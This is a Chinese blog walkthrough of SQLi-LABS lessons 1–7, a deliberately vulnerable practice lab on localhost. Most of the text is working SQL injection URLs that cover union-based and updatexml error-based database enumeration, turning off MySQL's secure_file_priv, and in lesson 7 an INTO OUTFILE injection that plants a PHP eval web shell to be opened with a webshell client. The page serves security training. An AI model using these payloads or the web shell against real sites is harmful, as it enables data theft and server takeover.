SQL注入天书SQLi-LABS(Less1-7)
SQL注入天书SQLi-LABS(Less1-7)
往期回顾:
SQLi-LABS搭建教程:SQL注入天书(SQLi-LABS)搭建
文章目录
- SQL注入天书SQLi-LABS(Less1-7)
- 一、SQL注入天书SQLi-LABS
- (一)Less-1
- (二)Less-2
- (三)Less-3
- (三)Less-4
- (三)Less-5
- (三)Less-6
- (三)Less-7
一、SQL注入天书SQLi-LABS
(一)Less-1
1、http://127.0.0.1/sqli-labs/Less-1/?id=1’ order by 3 %23
2、http://127.0.0.1/sqli-labs/Less-1/?id=-1’ union select 1,2,3 %23
3、http://127.0.0.1/sqli-labs/Less-1/?id=-1’ union select 1,database(),group_concat(schema_name) from information_schema.schemata %23
4、http://127.0.0.1/sqli-labs/Less-1/?id=-1’ union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema = ‘flag’ %23
5、http://127.0.0.1/sqli-labs/Less-1/?id=-1’ union select 1,database(),group_concat(column_name) from information_schema.columns where table_name= ‘flag’%23
6、http://127.0.0.1/sqli-labs/Less-1/?id=-1’ union select 1,database(),group_concat(flag) from flag.flag %23
此题后无特殊情况不再截图,只呈现注入过程。
(二)Less-2
1、http://127.0.0.1/sqli-labs/Less-2/?id=1 order by 3 %23
2、http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,3 %23
3、http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,database(),group_concat(schema_name) from information_schema.schemata %23
4、http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema = ‘flag’ %23
5、http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,database(),group_concat(column_name) from information_schema.columns where table_name= ‘flag’%23
6、http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,database(),group_concat(flag) from flag.flag %23
(三)Less-3
1、http://127.0.0.1/sqli-labs/Less-3/?id=1’) order by 3 %23
2、 http://127.0.0.1/sqli-labs/Less-3/?id=-1’) union select 1,2,3 %23
3、 http://127.0.0.1/sqli-labs/Less-3/?id=-1’) union select 1,database(),group_concat(schema_name) from information_schema.schemata %23
4、http://127.0.0.1/sqli-labs/Less-3/?id=-1’) union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema = ‘flag’ %23
5、http://127.0.0.1/sqli-labs/Less-3/?id=-1’) union select 1,database(),group_concat(column_name) from information_schema.columns where table_name= ‘flag’%23
6、http://127.0.0.1/sqli-labs/Less-3/?id=-1’) union select 1,database(),group_concat(flag) from flag.flag %23
(三)Less-4
这道题和上面的Less-3相似,本题为双引号“加)
http://127.0.0.1/sqli-labs/Less-4/?id=1") order by 3 %23
后面步骤一样
(三)Less-5
这道题当请求正确的时候不显示其他的东西,因此只能保持注入,updatexml不太明白的百度一下。
1、http://127.0.0.1/sqli-labs/Less-5/?id=1’ and updatexml(1,concat(’%7e’,(select group_concat(schema_name) from information_schema.schemata),’%7e’),1) %23
2、http://127.0.0.1/sqli-labs/Less-5/?id=1’ and updatexml(1,concat(’%7e’,(select group_concat(table_name) from information_schema.tables where table_schema=‘flag’),’%7e’),1) %23
3、爆列
4、显示flag
后面的语句同上。
(三)Less-6
本题和Less-5相似,本题是”号
1、http://127.0.0.1/sqli-labs/Less-6/?id=1" and updatexml(1,concat(’%7e’,(select group_concat(schema_name) from information_schema.schemata),’%7e’),1) %23
2、后面的步骤同上一题。
(三)Less-7
该题很实用。但是phpstudy的mysql没有给secure_file_priv的值。因此需要配置一下,才能完美做出此题。
secure-file-priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。
1、当secure_file_priv的值为null ,表示限制mysqld 不允许导入|导出
2、当secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入|导出只能发生在/tmp/目录下
3、当secure_file_priv的值没有具体值时,表示不对mysqld 的导入|导出做限制
在mysql文件下修改my.ini文件,最后加入:secure_file_priv=""
1、http://127.0.0.1/sqli-labs/Less-7/?id=1’)) order by 3 %23
2、http://127.0.0.1/sqli-labs/Less-7/?id=1’)) union select 1,2,3 into outfile “D:\Teachings\Learning_v2.0\WWW\sqli-labs\Less-7\123.txt” %23
此时就在less-7文件下导出一个123.txt文件,可以直接网页访问数据了。后面的步骤就是上面的基本操作,导出数据慢慢看。
本题可以导出一句话木马。
http://127.0.0.1/sqli-labs/Less-7/?id=1’)) union select 1,2,"<?php @eval($_POST[value]);?>" into outfile “D:\Teachings\Learning_v2.0\WWW\sqli-labs\Less-7\123.php” %23
然后菜刀直接链接。
示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。
SQL注入天书SQLi-LABS(Less1-7)相关推荐
- SQL注入天书(SQLi-LABS)搭建
SQL注入天书(SQLi-LABS)搭建: 安装SQLi-LABS需要准备相应的环境,推荐使用phpstudy软件,搭建也很快. SQLi-LABS下载地址:https://download.csdn ...
- SQL-Labs从搭建到闯关(SQL注入天书)
一.介绍 sql-labs是一个学习sql注入的平台,一共65关,每一关介绍了一种注入的类型. (1-22关) 二.环境搭建 GitHub项目地址:https://github.com/Audi- ...
- SQL注入天书-ASP注入漏洞全接触
引 言 随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多.但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序 ...
- SQLi Labs Less-1 联合注入+报错注入
第一关是单引号字符型注入,推荐使用联合注入.报错注入 方式一:联合注入 参考文章:联合注入使用详解,原理+步骤+实战案例 第一步.判断注入点 地址栏输入:?id=1' and 1 -- a,正常显示 ...
- SQl注入靶场sqli——第一关
在浏览器中 使用?id=1'–+ 是可以闭合的但是直接在数据库中查询就不会被闭合,这里估计是网页代码闭合的原因,在数据库中没有代码直接查询语句. 接下来是在闭合中添加语句执行我们想要的命令 使用 or ...
- SQL注入天书笔记(1)布尔盲注
前言
- SQL注入是什么?如何防止?
SQL注入是一种注入攻击,可以执行恶意SQL语句.下面本篇文章就来带大家了解一下SQL注入,简单介绍一下防止SQL注入攻击的方法,希望对大家有所帮助. 什么是SQL注入? SQL注入(SQLi)是一种 ...
- springboot防止XSS攻击和sql注入
文章目录 1. XSS跨站脚本攻击 ①:XSS漏洞介绍 ②:XSS漏洞分类 ③:防护建议 2. SQL注入攻击 ①:SQL注入漏洞介绍 ②:防护建议 3. SpringBoot中如何防止XSS攻击和s ...
- SQL注入漏洞入门(操作实现)
一 Sql-Inject的概述 SQL注入(SQLi)是一种注入攻击,,可以执行恶意SQL语句.它通过将任意SQL代码插入数据库查询,使攻击者能够完全控制Web应用程序后面的数据库服务器.攻击者可以使 ...
最新文章
- Qt——模态、非模态
- R语言对数线性模型loglm函数_使用R语言进行混合线性模型(mixed linear model) 分析代码及详解...
- 继承“HibernateDaoSupport”后,报“The hierarchy of the type AccoutDaoImpl is inconsistent”的解决方案...
- HTML5 移动页面自适应手机屏幕四类方法
- html5中meter讲解_Java中的得墨meter耳定律–最少知识原理–实际示例
- openstack havana vlan安装成功
- Linux下eclipse中shell脚本编程环境的搭建
- input file控件使用accept过滤 限制的文件类型
- python鼠标选中文本内容_【求助】使用Python脚本如何获取Windows中选中的文本
- 破解Bandicam
- mac自带的词典不能用
- 简练网软考知识点整理-项目风险应对策略
- 小程序typescript_16天:从概念到实现的TypeScript应用程序
- 阿里云七天训练营学习(4):服务器管理软件(putty、ccaa)
- 点亮技能 I 人机对话系统全面理解
- word批注怎么删除计算机名字,【2人回答】Word批注中的名字怎么删除?-3D溜溜网...
- IMPERVA-WAF 系统制作和安装-USB
- 伟景行Citymaker高亮图层的内元素CSharp
- ZIGBEE学习之---ZSTACK1.4.3修改密钥(CC2430)
- 全面总结C++类模板使用的基础知识
热门文章
- CF1734D Codeforces Round #822 (Div. 2) Slime Escape
- 详解Unity 5 全局光照系统Enlighten问题(上)
- 国赛培训——随机化算法——蒙特卡洛模拟
- SEO—创建链接诱饵
- UE4 录制及重播功能(类似死亡回放) 基于Wiki教程修改
- NEAR的高性价比进场位置
- AVPlayer没声音
- QTalk的源码公开!!
- 51单片机学习笔记-10IIC总线
- 富文本在服务器上图片不显示,解决CKEditor 4 富文本编辑器在图片组件无法显示[上传]选项卡的相关问题...